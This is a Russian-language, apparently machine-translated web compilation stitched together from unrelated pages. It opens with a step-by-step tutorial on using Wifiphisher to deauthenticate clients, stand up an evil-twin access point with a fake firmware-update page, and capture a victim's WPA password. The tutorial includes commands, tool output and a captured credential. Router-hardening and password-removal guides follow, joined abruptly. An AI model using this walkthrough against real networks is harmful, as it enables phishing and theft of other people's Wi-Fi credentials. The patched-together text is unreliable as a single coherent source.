Для начала мы можем открыть окно терминала и ввести apt install wifiphisher , чтобы установить Wifiphisher.
~ # apt install wifiphisher Чтение списков пакетов ... Готово Построение дерева зависимостей Чтение информации о состоянии ... Готово wifiphisher - это уже самая новая версия (1.4 + git20191215-0kali1). Следующие пакеты были установлены автоматически и больше не требуются: dh-python libdouble-conversion1 liblinear3 Используйте 'apt autoremove', чтобы удалить их. 0 обновлено, 0 установлено заново, 0 удалено и 1891 не обновлено.
Если вы хотите попробовать установить его из репозитория GitHub, вы можете сделать это, клонировав репозиторий и следуя инструкциям на странице GitHub, например:
~ # git clone https: // github.com / wifiphisher / wifiphisher.git ~ # cd wifiphisher ~ # sudo python setup.py install
Это должно установить Wifiphisher, который с этого момента вы можете начать, просто набрав имя программы в окне терминала.
Шаг 2. Просмотрите флаги Wifiphisher
У вас должна быть возможность запустить сценарий в любое время, просто набрав sudo wifiphisher в окне терминала. Хотя у Wifiphisher нет справочной страницы, на странице —help вы можете увидеть довольно внушительный список параметров конфигурации, которые вы можете изменить, добавив к команде различные флаги.
~ # wifiphisher --help использование: wifiphisher [-h] [-i ИНТЕРФЕЙС] [-eI EXTENSIONSINTERFACE] [-aI АПИНТЕРФЕЙС] [-iI ИНТЕРНЕТИНТЕРФЕЙС] [-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE] [-iNM] [-kN] [-nE] [-nD] [-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]] [-e ESSID] [-dE DEAUTH_ESSID] [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY] [-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT] [--logging] [-dK] [-lP LOGPATH] [-cP CREDENTIAL_LOG_PATH] [--payload-path PAYLOAD_PATH] [-cM] [-wP] [-wAI WPSPBC_ASSOC_INTERFACE] [-kB] [-fH] [-pPD PHISHING_PAGES_DIRECTORY] [--dnsmasq-conf DNSMASQ_CONF] [-pE PHISHING_ESSID] необязательные аргументы: -h, --help показать это справочное сообщение и выйти -i ИНТЕРФЕЙС, --interface ИНТЕРФЕЙС Вручную выберите интерфейс, поддерживающий как AP, так и режимы мониторинга для создания мошеннической точки доступа, а также проведение дополнительных атак Wi-Fi от расширений (я.е. деаутентификация). Пример: -i wlan1 -eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE Вручную выберите интерфейс, поддерживающий монитор режим деаутентификации жертв. Пример: -eI wlan1 -aI APINTERFACE, --apinterface APINTERFACE Вручную выберите интерфейс, поддерживающий режим AP для порождает мошенническую AP. Пример: -aI wlan0 -iI ИНТЕРНЕТИНТЕРФЕЙС, --интернет-интерфейс ИНТЕРНЕТИНТЕРФЕЙС Выберите интерфейс, подключенный к Интернет Пример: -iI ppp0 -iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE Укажите MAC-адрес интерфейса AP -iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_INTERFACE Укажите MAC-адрес интерфейса расширений -iNM, --no-mac-randomization Не меняйте MAC-адрес -kN, --keepnetworkmanager Не убивайте NetworkManager -nE, --noextensions Не загружать расширения.-nD, --nodeauth Пропустить этап деаутентификации. -dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...], --deauth-channels DEAUTH_CHANNELS [DEAUTH_CHANNELS ...] Каналы на деаутентификацию. Пример: --deauth-channels 1,3,7 -e ESSID, --essid ESSID Введите ESSID мошеннической точки доступа. Этот вариант пропустит этап выбора точки доступа. Пример: --essid «Бесплатный Wi-Fi» -dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID Деаутентифицируйте все BSSID в WLAN с этим ESSID.-p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO Выберите сценарий фишинга для запуска. пропустить этап выбора сценария. Пример: -p Обновление прошивки -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY Добавьте защиту WPA / WPA2 на несанкционированную точку доступа. Пример: -pK s3cr3tp4ssw0rd -hC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE Захват рукопожатий WPA / WPA2 для проверки пароль Пример: -hC capture.pcap -qS, --quitonsuccess Остановить скрипт после успешного получения одной пары полномочий -lC, --lure10-capture Захват BSSID обнаруженных точек доступа на этапе выбора точки доступа. Эта опция является частью Lure10 атака. -lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT Обманите службу определения местоположения Windows в соседней Windows пользователи считают, что он находится в области, которая была ранее был записан с помощью --lure10-capture.Часть Lure10 атака. - ведение журнала активности в файл -dK, --disable-karma Отключает атаку KARMA -lP LOGPATH, --logpath LOGPATH Определите полный путь к файлу журнала. -cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH Определите полный путь к файлу, который будет хранить любые захваченные учетные данные --payload-путь PAYLOAD_PATH Путь полезной нагрузки для сценариев, обслуживающих полезную нагрузку -cM, --channel-monitor Следите за тем, чтобы целевая точка доступа меняла канал.-wP, --wps-pbc Следить за тем, чтобы кнопка на регистраторе WPS-PBC нажал. -wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE Интерфейс WLAN, используемый для подключения к WPS. Точка доступа. -kB, --known-beacons Транслировать рекламные кадры ряда маяков популярные WLAN -fH, --force-hostapd Принудительно использовать hostapd, установленный в системе -pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DIRECTORY Искать фишинговые страницы в этом месте --dnsmasq-conf DNSMASQ_CONF Определите полный путь к настраиваемому dnmasq.conf файл -pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID Определите ESSID, который вы хотите использовать для фишинга стр.
Шаг 3. Подключите адаптер беспроводной сети
Теперь пора подготовить адаптер беспроводной сети, подключив его. Wifiphisher переведет вашу карту в режим беспроводного мониторинга, если вы не сделаете этого сами.
Хороший адаптер дальнего действия на Amazon: USB-адаптер Alfa AWUS036NHA Wireless B / G / N — 802.11n — 150 Мбит / с — 2,4 ГГц — 5 дБи Антенна
Шаг 4: Запуск сценария
Я собираюсь использовать свой беспроводной сетевой адаптер USB, поэтому я добавлю к команде флаг -i и добавляю имя моего сетевого адаптера. Если я этого не сделаю, Wifiphisher просто возьмет любой сетевой адаптер, какой сможет.
Чтобы запустить сценарий, я выполню следующую команду.
~ # wifiphisher -i wlan1
После этого мы должны увидеть страницу со всеми ближайшими сетями.Здесь мы можем выбрать, какую сеть мы хотим атаковать, и нажать Введите .
Опции: [Esc] Выйти [Стрелка вверх] Переместить вверх [Стрелка вниз] Переместить вниз ESSID BSSID CH PWR ENCR КЛИЕНТЫ ВЕНДОР _________________________________________________________________________________________ │ Команда исследователей CIC.m ██████████████ ███ 100% ОТКРЫТО 0 Неизвестно │ │ ██████████████ ██████████████ ███ 100% WPA2 2 Belkin International │ │ █████████████ ██████████████ ███ 98% WPA2 0 Неизвестно │ │ █████████████████ ██████████████ ███ 94% WPA2 6 Arris Group │ │ ████████████ ██████████████ ███ 86% WPA2 / WPS 1 Неизвестно │ │ █████████████ ██████████████ ███ 78% WPA2 / WPS 3 Belkin International │ │ ███████████ ██████████████ ███ 78% WPA2 / WPS 0 Asustek Computer │ │ ████████████ ██████████████ ███ 78% WPA2 / WPS 4 Hon Hai Precision Ind.│ │ █████████████████ ██████████████ ███ 74% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ ████████████ ██████████████ ███ 74% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 74% WPA2 / WPS 2 Technicolor CH USA │ │ ████████████ ██████████████ ███ 70% WPA2 / WPS 1 Technicolor CH USA │ │ ███████████ ██████████████ ███ 70% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 90% WPA2 0 Неизвестно │ │ ████████████ ██████████████ ███ 66% WPA2 0 Неизвестно │ │ ████████████ ██████████████ ███ 66% WPA2 / WPS 0 Hon Hai Precision Ind.│ │ ████████████ ██████████████ ███ 62% WPA2 / WPS 2 Asustek Computer │ │ ███████████████ ██████████████ ███ 62% WPA2 / WPS 3 Неизвестно │ │ █████████████ ██████████████ ███ 62% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ ████████████ ██████████████ ███ 58% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ █████████████ ██████████████ ███ 58% WPA2 / WPS 0 Неизвестно │ │ ████████████████ ██████████████ ███ 58% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 58% WPA2 / WPS 0 Hon Hai Precision Ind.│ │ ██████████ ██████████████ ███ 54% WPA2 / WPS 0 Группа Arris │ │ ██████████ ██████████████ ███ 46% WPA2 0 Технологии Tp-link │ │ █████████████████ ██████████████ ███ 46% WPA2 / WPS 0 Asustek Computer │ —————————————————————————————————————————————————— ———————————————————————————————————————
Далее скрипт спросит, какая атака ты хочешь бежать. Выберите вариант 2.
Параметры: [Esc] Выйти [Стрелка вверх] Переместить вверх [Стрелка вниз] Переместить вниз Доступные сценарии фишинга: 1 - Network Manager Connect Имитирует поведение сетевого администратора.В этом шаблоне отображается страница Chrome «Ошибка подключения» и окно диспетчера сети через страницу с запросом предварительного общего ключа. В настоящее время поддерживаются сетевые диспетчеры Windows и MAC OS. 2 - Страница обновления прошивки Страница конфигурации маршрутизатора без логотипов или брендов, запрашивающая пароль WPA / WPA2 из-за обновления прошивки. Подходит для мобильных устройств. 3 - Страница входа в OAuth Бесплатная служба Wi-Fi, запрашивающая учетные данные Facebook для аутентификации с использованием OAuth. 4 - Обновление плагина браузера Общая страница обновления подключаемого модуля браузера, которую можно использовать для предоставления полезных данных жертвам.
После выбора атаки сразу запустится. Откроется страница для отслеживания целей, присоединяющихся к сети. Wifiphisher также будет прослушивать устройства, пытающиеся подключиться к сетям, которых нет, и будет создавать поддельные версии, чтобы заманить эти устройства для подключения.
Канал расширений: │ Wifiphisher 1.4GIT DEAUTH / DISAS - ██████████████████ │ ESSID: DEAUTH / DISAS - ██████████████████ │ Канал: 11 │ Интерфейс AP: wlan1 │ Варианты: [ESC] Выйти │ _________________________ Связанные жертвы: Запросы HTTPS:
После того, как цель присоединится, всплывающее окно потребует ввести пароль.
Когда цель вводит пароль, мы уведомляемся на экране Wifiphisher.
Канал расширений: DEAUTH / DISAS - ██████████████████ DEAUTH / DISAS - ██████████████████ DEAUTH / DISAS - ██████████████████ Жертва █████████████████ проверила WLAN с помощью ESSID: 'FakeNed' (KARMA) Жертва █████████████████ проверила WLAN с помощью ESSID: «Хармонд Фернандес» (Злой Близнец) Связанные жертвы: ██████████████████ 10.0.0.13 Apple iOS / MacOS ██████████████████ 10.0.0.29 Murata Manufacturing HTTPS-запросы: [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] POST-запрос из 10.0.0.13 с wfphshr-wpa-password = myfatpassword [*] Запрос GET от 10.0.0.13 для http://captive.apple.com/hotspot-detect.html
Вот и все! Скрипт завершится и представит вам только что введенный пароль.
[*] Запуск Wifiphisher 1.4GIT (https://wifiphisher.org) в 2020-02-04 08:10 [+] Обнаружен часовой пояс. Установка диапазона каналов от 1 до 13 [+] Выбор интерфейса wfphshr-wlan0 для атаки деаутентификации [+] Выбор интерфейса wlan1 для создания мошеннической точки доступа [+] Изменение MAC-адреса wlan1 (BSSID) на 00: 00: 00: 31: 8c: e5 [!] Не удалось установить MAC-адрес. (Пробовал 00: 00: 00: ee: 5c: 95) [+] Отправка SIGKILL на wpa_supplicant [+] Отправка SIGKILL dhclient [+] Отправка SIGKILL dhclient [+] Отправка SIGKILL в NetworkManager [*] Убрал аренду, запустил DHCP, настроил iptables [+] Выбор шаблона страницы обновления прошивки [*] Запуск фейковой точки доступа... [*] Запуск HTTP / HTTPS-сервера на портах 8080, 443 [+] Покажи свою поддержку! [+] Следите за нами: https://twitter.com/wifiphisher [+] Ставьте лайк: https://www.facebook.com/Wifiphisher [+] Полученные учетные данные: wfphshr-wpa-password = myfatpassword [!] Закрытие
Вот так, вы обошли любую защиту паролем и обманом заставили пользователя ввести пароль Wi-Fi в вашу поддельную сеть. Хуже того, они все еще застряли за этим ужасным медленным фальшивым экраном загрузки.
Если вы ищете дешевую и удобную платформу для начала работы с Wifipfisher, ознакомьтесь с нашей сборкой Kali Linux Raspberry Pi с использованием недорогой Raspberry Pi.
Изображение Kody / Null ByteНадеюсь, вам понравилось это руководство по атакам социальной инженерии с использованием Wifiphisher! Если у вас есть какие-либо вопросы об этом руководстве по захвату паролей Wi-Fi или у вас есть комментарий, сделайте это ниже и не стесняйтесь обращаться ко мне в Twitter @KodyKinzie.
Начните взламывать сегодня: настройте безголовую платформу для взлома Raspberry Pi под управлением Kali Linux
Хотите начать зарабатывать деньги как хакер в белой шляпе? Начните свою профессиональную карьеру хакера с помощью нашего комплекта обучения премиум-сертификату по этическому хакерству 2020 года из нового магазина Null Byte и получите более 60 часов обучения от профессионалов в области этического хакерства.
Купить сейчас (90% скидка)>
Изображение на обложке Джастина Мейерса / Gadget Hacks; Скриншоты Kody / Null Byte .Как безопасно настроить WiFi-роутер
Беспроводной доступ в Интернет или Wi-Fi стал необходимостью дома и на рабочем месте, но он также может открыть дверь для рисков со стороны хакеров, мошенников и похитителей личных данных. Будь то у вас дома или в офисе, незащищенный маршрутизатор Wi-Fi, работающий с настройками производителя по умолчанию, может стать проблемой, когда дело доходит до хакеров и скваттеров Wi-Fi, которые получают доступ к вашей личной информации и обременяют вашу широкополосную связь.
Если ваша сеть Wi-Fi не защищена должным образом — общедоступный IP-адрес, нет уникального пароля Wi-Fi — вы можете позволить любому, у кого есть беспроводное устройство, получить доступ.Возможно, вас не беспокоит, что кто-то использует ваше беспроводное соединение, но реальный риск заключается в том, что конфиденциальная информация, которую вы отправляете и получаете, — ваши электронные письма, банковская информация и, возможно, даже ежедневное расписание вашего умного дома, — подвергается киберпреступникам.
Базовая безопасность маршрутизатора
У каждого маршрутизатора должен быть надежный пароль, чтобы не допустить злоумышленников. Некоторые новые маршрутизаторы поставляются с паролями по умолчанию, но вы должны изменить их во время настройки. Создать новый сложный уникальный пароль для беспроводного маршрутизатора очень просто.Это займет всего пару минут. Конкретные инструкции различаются от одного маршрутизатора к другому, но основная идея такова:
- Все беспроводные маршрутизаторы имеют числовой адрес. Если вы потеряли инструкции, возможно, их можно будет найти, выполнив поиск в Интернете по номеру модели маршрутизатора.
- В настройках безопасности создайте имя для маршрутизатора и пароль, а затем выберите тип шифрования, например WAP2. Не называйте маршрутизатор чем-то, что может быть легко связано с вами, например вашей фамилией.
- Убедитесь, что вы выбрали сложный пароль, который можно запомнить, но который нелегко угадать.
- Не забудьте сохранить обновленную информацию при появлении запроса. Теперь ваш маршрутизатор защищен от киберпреступников в роуминге.
Различные типы шифрования
В зависимости от вашего маршрутизатора у вас могут быть варианты для различных видов шифрования. Наиболее распространенные типы шифрования маршрутизатора — WEP, WPA и WPA2. Коммерческие маршрутизаторы от таких брендов, как Netgear, Linksys и ASUS, часто включают:
- Wired Equivalent Privacy (WEP): это самая старая и самая популярная форма шифрования маршрутизатора.Однако это наименее безопасный из всех протоколов шифрования. Он использует радиоволны, которые легко взломать. Для каждого передаваемого пакета данных используется один и тот же ключ шифрования. С помощью автоматизированного программного обеспечения эту информацию можно легко проанализировать.
- Wi-Fi Protected Access (WPA): Wi-Fi Alliance разработал WPA, чтобы предложить протокол шифрования без недостатков WEP. Он шифрует ключ шифрования, тем самым избавляясь от проблем, вызванных хакерами, взламывающими радиоволны.Это также менее безопасная форма шифрования, отчасти из-за устаревшего оборудования и прошивки, которые по-прежнему использовали WEP в качестве основного протокола. Однако это значительное улучшение по сравнению с WEP.
- Wi-Fi Protected Access 2 (WPA2): этот тип шифрования в настоящее время является наиболее безопасным и новейшим доступным способом шифрования. Вам всегда следует выбирать WPA2, если он доступен. Он не только шифрует ключ шифрования, но также не позволяет использовать протокол целостности временного ключа или TKIP, который, как известно, менее безопасен, чем AES.
- Advanced Encryption Standard: по возможности следует использовать AES поверх WPA2 или WPA. Это тот же тип шифрования, который используется федеральным правительством для защиты секретной информации. Маршрутизаторы, выпущенные после 2006 года, должны иметь возможность включить это поверх WPA2.
Как безопасно настроить Wi-Fi роутер: особенности
Производители знают, насколько важно делать свою продукцию удобной для пользователя. Большинство маршрутизаторов поставляются с инструкциями, которые легко установить и настроить.Приложения заменяют громоздкие руководства пользователя и веб-интерфейсы, которые проводят пользователей через процесс настройки. Хотя использование приложений упростило настройку маршрутизаторов для клиентов, он может быть не полностью безопасным. Перед настройкой роутера следует учесть несколько моментов.
Обновите свой роутер до новой прошивки и поддерживайте ее в актуальном состоянии
Обновление микропрограммы маршрутизатора — важная мера безопасности, помогающая защитить маршрутизатор от новейших угроз. Большинство современных маршрутизаторов позволяют включать уведомления, которые будут предупреждать вас, когда производитель выпускает исправления и обновления для прошивки маршрутизатора.Некоторые производители могут даже автоматически установить обновление на ваше оборудование, поэтому вам не нужно ничего делать. Однако есть некоторые маршрутизаторы, у которых есть обновления в параметрах настроек. В этом случае пользователь должен регулярно обновлять прошивку вручную.
Измените учетные данные для входа и пароль маршрутизатора
Традиционные маршрутизаторы поставляются с паролем по умолчанию, созданным производителем. Хотя он может выглядеть сложным и устойчивым к взлому, есть большая вероятность, что у большинства моделей одного и того же маршрутизатора один и тот же пароль.Эти пароли часто легко отследить или найти в Интернете.
Убедитесь, что вы изменили пароль маршрутизатора во время настройки. Выберите сложный буквенно-цифровой пароль из нескольких символов. Если возможно, также измените имя пользователя вашей сети. В конце концов, это половина учетных данных для входа в систему.
Всегда используйте WPA2 для защиты беспроводной сети
Wi-Fi Protected Access 2, более известный как WPA2, — это широко используемая технология сетевой безопасности, используемая в беспроводных маршрутизаторах.
Это один из самых безопасных вариантов шифрования, доступных на рынке с 2006 года. WPA2 шифрует входящий и исходящий трафик маршрутизатора. Это означает, что даже если кто-то находится в пределах досягаемости и может видеть трафик, все, что они видят, — это зашифрованная версия.
Отключить WPS
Wi-Fi Protected Setup (WPS) был создан с целью упростить и ускорить работу пользователей при подключении новых устройств к сети. Он основан на том, что вы нажимаете кнопку на маршрутизаторе и кнопку на устройстве.При этом оба устройства автоматически соединяются.
Пользователь может использовать личный идентификационный номер или PIN-код, чтобы настроить устройство для создания соединения. Это исключает использование 16-значного пароля WPA, который используется большинством маршрутизаторов.
Однако из-за PIN-кода WPS заработал плохую репутацию как небезопасный. PIN-код — это восьмизначное число, которое можно легко взломать, многократно используя различные комбинации имен пользователей и паролей. Это осуществляется с помощью программного обеспечения.Такой вид атаки называется атакой грубой силы.
Большинство маршрутизаторов позволяют пользователям отключать WPS. Даже если параметр PIN отключен, разумно отключить WPS. В последние годы было обнаружено, что многие маршрутизаторы известных производителей разрешают аутентификацию на основе PIN-кода, даже если она, казалось, отключена.
Составьте график работы беспроводной сети
Если вы не используете устройства, подключенные к Интернету, например умные кофеварки и умные холодильники, то составление расписания работы беспроводной сети может вам подойти.Это помогает отключить Интернет, когда он не используется. Отключенная сеть не будет отображаться в списке хакеров.
Избавьтесь от любых небезопасных или непроверенных услуг
Было бы разумно отключить удаленный доступ к маршрутизатору, когда вы активно к нему подключены.
Возьмем, к примеру, UPnP. Universal Plug and Play или UPnP — это простой способ позволить устройствам находить другие устройства в вашей сети. Он также может изменить маршрутизатор, чтобы устройства из других сетей могли получать доступ к вашему устройству.Однако он помог хакерам внедрить вредоносные программы и вирусы, заставив их обходить брандмауэр. Mirai Botnet — пример одной из таких атак.
Настройка гостевой сети для устройств умного дома
Гостевая сеть имеет свои преимущества. Он не только предоставляет вашим гостям уникальный SSID и пароль, но также ограничивает доступ посторонних к вашей основной сети, в которой работают ваши подключенные устройства.
После того, как вы настроили гостевую сеть, вам не нужно будет сообщать свой пароль основной сети своим гостям.Они не смогут получить доступ к вашим устройствам с поддержкой Интернета вещей или заразить вашу сеть и устройства вредоносными программами или вирусами, которые могут быть на их устройствах.
Другие помощники по обеспечению безопасности маршрутизатора
Помимо настроек маршрутизатора и использования функций безопасности вашей сети Wi-Fi, есть и другие варианты, такие как использование виртуальной частной сети, помимо защиты устройства и кражи личных данных.
Используйте виртуальную частную сеть или VPN
Виртуальная частная сеть (VPN) шифрует соединения между устройствами, обеспечивая конфиденциальность и анонимность в сети.VPN может маскировать ваш IP-адрес, поэтому ваши действия в сети практически невозможно отследить. Службы VPN устанавливают безопасные и зашифрованные соединения, чтобы обеспечить большую конфиденциальность данных, которые вы отправляете и получаете, даже в защищенных точках доступа Wi-Fi.
Всегда использовать межсетевой экран
Межсетевой экран контролирует входящий и исходящий сетевой трафик и разрешает или блокирует определенный трафик. Это важная функция безопасности, на которую следует обратить внимание при выборе маршрутизатора. Чтобы обеспечить безопасность вашей сети и устройств в Интернете, лучше никогда не отключать брандмауэр.
Установите и используйте надежный антивирус и программное обеспечение безопасности
Настройка безопасности вашей беспроводной сети совсем не занимает много времени и поможет защитить вас от хакеров. Киберпреступники неустанно работают, чтобы получить доступ к вашей личной и финансовой информации. Небольшие вложения в программное обеспечение безопасности могут иметь большое значение.
Даже если у вас нет соседей, которых вы не хотите, чтобы вы могли одолжить свой Wi-Fi, вы защитите себя от более опасных шпионов.Особенно сейчас, когда к сети подключено так много домов и различные устройства используют Wi-Fi, вам стоит защитить всю информацию, которую эти устройства содержат. Не рискуй. Всего несколько минут выбора правильных настроек домашнего Wi-Fi-роутера могут существенно изменить ваш подключенный мир.
.Убрать пароль с Wi-Fi сети (Wi-fi без пароля)
Вы хотите удалить пароль от wi-fi и сделать wi-fi сеть открытой. Как сделать открытую сеть читайте в этой статьеДля того, чтобы убрать пароль с wi-fi соединения, вам понадобиться знать свой внутренний ip адрес роутера. Устройства, которое раздаёт wi-fi.
Теперь, после того, как адрес роутера вы узнали. Откройте любой браузер. Можно Интернет эксплорер, Google Chrome, Opera. Без разницы какой браузер, убрать пароль с wi-fi сети вы можете с любого браузера
Супер! Теперь введите основной ip адрес который вы узнали. 192.168.0.1 либо 192.168.1.1.
Супер. Теперь надо ввести логин и пароль от своего роутера, чтобы сбросить wi-fi пароль. Обычно он указан на вашем устройстве, часто это admin / admin или admin и пароля нет. Если у вас прошивка OpenWrt – то логин пароль в данном случае root логин и пароля нет.
Когда в админку мы попали нам надо искать Wi-fi Wireless или Безопасность Wi-fi сети – именно тут мы будем сбрасывать свой wi-fi пароль и делать wi-fi сеть открытой
Как сбросить пароль на роутерах D-link
Сперва измените язык интерфейса на Русский так будет удобней работать в дальнейшем
Теперь перейдите в Wi-fi – Настройка Безопасности – Сетевая аутентификация ставим OPEN и нажимаем ПРИМЕНИТЬ. Всё. Наше Wi-fi соединение теперь открыто и к ней может подключиться любой желающий
Как убрать пароль с wi-fi сети на роутерах Tp-link но с прошивкой OpenWRT
Заходим в админку роутера
Обычно 192.168.1.1 или 192.168.1.100, бывает также 192.168.0.1
Теперь переходим в Network – Wifi – Edit – Wireless Security — Encryption: no Encryption
Всё!
Ваше соединение Wi-fi открыто для всех желающих и к нему может подключиться каждый.
Главное знать одно! Если вы делаете Wi-fi сеть открытой, обязательно измените пароль администратора от роутера. Ведь если к вам подключится плохой человек. Он также само может зайти в роутер, через admin / admin и испортить вам настройки. Удачи!
Убираем пароль и делаем WiFi сеть открытой
В прошлых статьях, уже не раз было рассказано про установку пароля на свою беспроводную сеть, тем самым закрыв доступ посторонним к Wi-Fi. А теперь, давайте рассмотрим как сделать свой Wi-Fi открытым, то есть доступным без пароля.
Зачем предоставлять всем свою точку доступа, спросите Вы? Ситуации бывают разные, к примеру нужно в своем кафе организовать доступ к интернету так, что бы все посетители могли легко подключаться и не заморачиваться с вводом пароля. Для любителей вечеринок тоже может пригодиться эта статья, что бы организовать свободный Wi-Fi для своих гостей. А может Вы просто добрый человек и легко можете поделиться интернетом со своими соседями. Ситуаций подобных может быть великое множество, иногда действительно полезно иметь открытую точку доступа Wi-Fi.
Перед началом установки подобной сети следует рассмотреть такие особенности:
- Интернет будет доступен всем, кто находится в радиусе действия роутера. Подключение к нему не будет вызывать особых трудностей. По этому, к роутеру может подключаться одновременно очень много устройств, тем самым серьезно загружая его. Если он не слишком мощный, то такая нагрузка может привести к постоянным перебоям с интернетом.
- Скорость интернета так же падает, пропорционально количеству подключенных устройств.
- С любого подключенного устройства можно будет легко попасть в настройки роутера. По этому, рекомендую заменить стандартный логин и пароль на более сложные. Так же существуют способы вообще запретить доступ к настройкам, для всех устройств кроме Вашего.
- Снижается уровень безопасности файлов, которые доступны в локальной сети. В некоторых случаях устройства, подключенные к точке доступа, получают доступ и к файлам в открытом доступе. В таких случаях нужно устанавливать статус сети «Общественная сеть».
- Это основные моменты, которые нужно учитывать при запуске открытой сети Wi-Fi. Теперь рассмотрим сам процесс настройки.
Убираем пароль с Wi-Fi
На таких роутерах как Tp-Link, включение свободного доступа к Wi-Fi осуществляется довольно просто. Заходим в настройки самого роутера. Как это сделать, можно почитать в одной из предыдущих статей.
Выберите в меню раздел Wireless и нажмите на подраздел Wireless Security. Некоторые маршрутизаторы имеют меню на русском языке, тогда выберите Беспроводной режим и затем Защита беспроводного режима.
Теперь устанавливаем переключатель в положение Disable Security (Выключение защиты) и сохраняем выполненную настройку, нажав кнопку Save (или «Сохранить» в русскоязычной версии). Тем самым мы отключили защиту сети и сохранили настройки.
Подключаемся к сети Wi-Fi без ввода пароля
Для тех, кто пользуется роутерами от Asus, отключение защиты выглядит следующим образом.
Открыв настройки роутера, сразу в основном меню выбираем метод проверки подлинности «Open System». И все, сеть теперь доступна всем. Как видите, настройка еще проще.
Если используете устройство от другого производителя, то отключение пароля нужно искать в разделе настроек отвечающих за безопасность, либо там где нужно этот пароль указывать. В общем, ищите настройки похожего содержания.
Для того, что бы снова закрыть свою сеть Wi-Fi, устанавливаете пароль в настройках и выполняете перезагрузку роутера. Потом можно проконтролировать, что никто посторонний не подключен, посмотрев список подключенных устройств, в тех же настройках.
На этом все. Если что-то будет не получаться, то отписывайтесь в комментариях, с радостью поможем.
Как снять пароль с wifi роутера : Радиосхема.ру
на обратно стороне модема написано доступ к настройкам. Уже давно не возможно попасть к настройкам по набору в адресной строке браузера 192.168.0.1
Там написанно если не ошибаюсь через www
Домашняя беспроводная сеть Wi-Fi должна быть защищена паролем. Но ведь бывают разные случаи, скажете вы. Например, вы хотите пригласить друзей и устроить вечеринку. В таком случае, следует предусмотреть, что они (ваши друзья), скорее всего, захотят подключиться к интернету. А это соответственно не должно сопровождаться никакими трудностями. И чтобы не возиться с паролями, лучше на некоторое время просто отключить пароль доступа к Wi-Fi. Потом его можно будет установить заново.
Или, быть может, у вас возникли какие-то проблемы с подключением того или иного устройства. И дабы особо не заморачиваться, не искать решение проблем связанных с паролем и типом безопасности, можно временно убрать пароль. Часто подобные проблемы возникают, например, при подключении телевизора (Smart TV) к беспроводной сети.
Как снять пароль с Wi-Fi
Итак, прежде всего, вам, разумеется, нужно открыть настройки маршрутизатора. Далее перейдите на вкладку с настройками безопасности беспроводной сети.
В случае с маршрутизаторами Asus, снять пароль достаточно легко – нужно просто перейти на вкладку «Беспроводная сеть» и в графе метод проверки подлинности установите «Open System».
Для нового веб интерфейса Asus:
Затем нужно сохранить настройки и перезагрузить роутер.
Если же у вас стоит роутер TP-Link, следует перейдите на вкладку Wireles — Wireless Security и нажать «Disable Security». Подтвердите изменением настроек и перезагрузите маршрутизатор.
Для русского веб интерфейса TP-Link:
Подтвердите изменением настроек и перезагрузите маршрутизатор.
Для роутеров D-Link нужно открыть вкладку «SETUP» затем выбрать «WIRELESS SETTINGS» и нажать в самом низу на кнопку Manual Wireless Connection Setup, после этого откроется страница с настройками беспроводной сети, в самом низу видим пункт Security Mode выберем из списка None. (Для старых версий прошивок)
Для нового веб интерфейса D-Link нажимаем на вкладке Wi-Fi «настройки безопасности» далее в пункте «сетевая аутентификация» выбираем open.
Применяем изменением настроек и перезагрузите маршрутизатор.
В случае с роутерам TP-Link следует открыть вкладку «System Tools» –> «Password».
Для роутеров Asus – «Администрирование» –> «Изменить системный пароль».
А сделать это, действительно, очень важно, чтобы люди, которые подключатся к вашему Wi-Fi не смогли изменить настройки вашего роутера.
В рамках тематических статей на нашем сайте мы уже рассматривали инструкции по корректной настройке различных маршрутизаторов для работы с домашним интернетом от провайдера Ростелеком. И сегодня мы также хотим уделить внимание настройке такого оборудования, однако речь пойдет не непосредственно о конфигурировании интернет-подключения, а о других функциях данных сетевых устройств, которые также являются очень важными и нередко интересуют пользователей домашних компьютерных сетей.
Наиболее популярными роутерами, которые сегодня используются абонентами Ростелеком, да и других интернет-провайдеров, являются устройства производства компании D-Link, поэтому сегодняшние инструкции мы будем рассматривать на их примере. Однако, стоит отметить, что когда речь идет о настройках маршрутизаторов через их веб-интерфейс, алгоритм действий является практически идентичным почти для всех устройств, любых производителей и моделей.
Как отключить Wi-Fi на роутере Ростелеком
Первый вопрос, который мы хотим рассмотреть, касается информации об отключении Вай Фай на маршрутизаторах, подключенных к домашнему интернету от Ростелеком. Стоит отметить, что, в общем, при такой поставленной задаче нюанс, касающийся подключенного провайдера, не является принципиальным, ведь речь идет непосредственно о внесении конфигураций в настройку самого маршрутизатора.
Процедура деактивации беспроводной связи может быть инициирована пользователями по разным причинам. К примеру, если беспроводной роутер выступает исключительно в роли проводного маршрутизатора и нужды «коннектить» нему устройства «по воздуху» нет. Чтобы отключить Вай Фай на роутере Ростелеком, необходимо выполнить следующие действия:
- На компьютере или ноутбуке, подключенном к маршрутизатору через кабель, запустите веб-браузер.
- В адресной строке браузера укажите IP адрес вашего роутера и нажмите «Enter». По умолчанию данный параметр стоит на 192.168.1.1 или 192.168.0.1.
